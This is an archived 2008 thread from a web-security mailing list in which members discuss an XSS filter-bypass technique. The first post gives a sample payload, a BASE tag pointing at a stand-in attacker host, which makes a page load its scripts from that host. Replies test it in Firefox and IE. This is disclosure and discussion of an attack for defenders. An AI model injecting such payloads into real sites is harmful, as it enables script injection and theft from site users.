[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [WEB SECURITY] Nice little XSS trick

From: "Prasad Shenoy" <prasad.shenoy@xxxxxxxxx>
Subject: Re: [WEB SECURITY] Nice little XSS trick
Date: Tue, 15 Jul 2008 13:40:27 -0400

James -

The trick still works in FF even if I set the doctype (4.01) to strict.

Thanks,
Prasad Shenoy

On Tue, Jul 15, 2008 at 1:17 PM, James Landis <jcl24@xxxxxxxxxxx> wrote:
> Sounds like this could be due to the difference between Strict and
> Quirks mode rendering.
>
> On Tue, Jul 15, 2008 at 10:00 AM, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
>> Definitely. Inserting <base> tag in <body> of an HTML document works
>> in Firefox 2.0.0.15
>>
>> Thanks
>> Prasad Shenoy
>>
>> On Tue, Jul 15, 2008 at 1:50 PM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>> Prasad Shenoy wrote:
>>>>
>>>> Amit -
>>>>
>>>> When you say observed by FF 2, I guess you mean this should not work
>>>> in FF 2 correct? But it works with FF 2.
>>>>
>>>
>>> When I tested it, FF 2 ignored BASE tags outside the HEAD section (if you
>>> have information to the contrary, please share). That doesn't mean the
>>> attack completely fails - it means that the injection point must be inside
>>> the HEAD section (less common, but may still happen).
>>>
>>>> As this is a very simple example, I would like to believe that you are
>>>> assuming that in order to invoke functions from the attacker
>>>> controlled JS file (because there is no JS involved in the payload),
>>>> the attacker would create a file with the same filename and function
>>>> names as the one on the victim's domain. This way the actual (good) JS
>>>> file will be overwritten by the attacker controlled JS and all the
>>>> functions will be called from cross domain.
>>>>
>>>
>>> Exactly.
>>>
>>> -Amit
>>>
>>>
>>>> Valid?
>>>>
>>>> Thanks
>>>> Prasad Shenoy
>>>>
>>>> Prasad Shenoy
>>>> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>>>>
>>>>>
>>>>> Hi list
>>>>>
>>>>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>>>>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>>>>> on
>>>>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>>>>> BASe, but not the trick I describe here). The idea is to use the HTML
>>>>> BASE
>>>>> tag to force loading of JS code from the attacker's host. Consider a page
>>>>> with XSS vulnerability such as:
>>>>>
>>>>> <html>
>>>>> ...
>>>>> ***XSS code may be embedded here***
>>>>> ...
>>>>> <script src="/foo/bar.js"></script>
>>>>> ...
>>>>> </html>
>>>>>
>>>>> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
>>>>> next
>>>>> thing you know, the browser (IE, at least) loads the JS from
>>>>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>>>>> "explicit" JS code involved in the payload itself.
>>>>>
>>>>> Note that according to the HTML standard, BASE should be placed in the
>>>>> HEAD
>>>>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
>>>>> is
>>>>> indeed observed by FF 2, but not by IE (checked IE6).
>>>>>
>>>>> Thanks,
>>>>> -Amit
>>>>>
>>>>>
>>>>>
>>>>> ----------------------------------------------------------------------------
>>>>> Join us on IRC: irc.freenode.net #webappsec
>>>>>
>>>>> Have a question? Search The Web Security Mailing List Archives:
>>>>> http://www.webappsec.org/lists/websecurity/archive/
>>>>>
>>>>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS
>>>>> Feed]
>>>>>
>>>>> Join WASC on LinkedIn
>>>>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>>>>
>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>>
>>>
>>>
>>
>>
>>
>> --
>> Ah! the joy of hacking....
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS:
>> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>



-- 
Ah! the joy of hacking....

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

Follow-Ups:
- Re: [WEB SECURITY] Nice little XSS trick
  - From: James Landis

References:
- [WEB SECURITY] Nice little XSS trick
  - From: Amit Klein
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Prasad Shenoy
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Amit Klein
- Re: [WEB SECURITY] Nice little XSS trick
  - From: Prasad Shenoy
- Re: [WEB SECURITY] Nice little XSS trick
  - From: James Landis

Prev by Date: [WEB SECURITY] Re: [Webappsec] Corsaire whitepaper: Breaking the Bank (Vulnerabilities in Numeric Processing within Financial Applications)
Next by Date: RE: [WEB SECURITY] Nice little XSS trick
Previous by thread: Re: [WEB SECURITY] Nice little XSS trick
Next by thread: Re: [WEB SECURITY] Nice little XSS trick
Index(es):
- Date
- Thread

Brought to you by http://www.webappsec.org
Search this site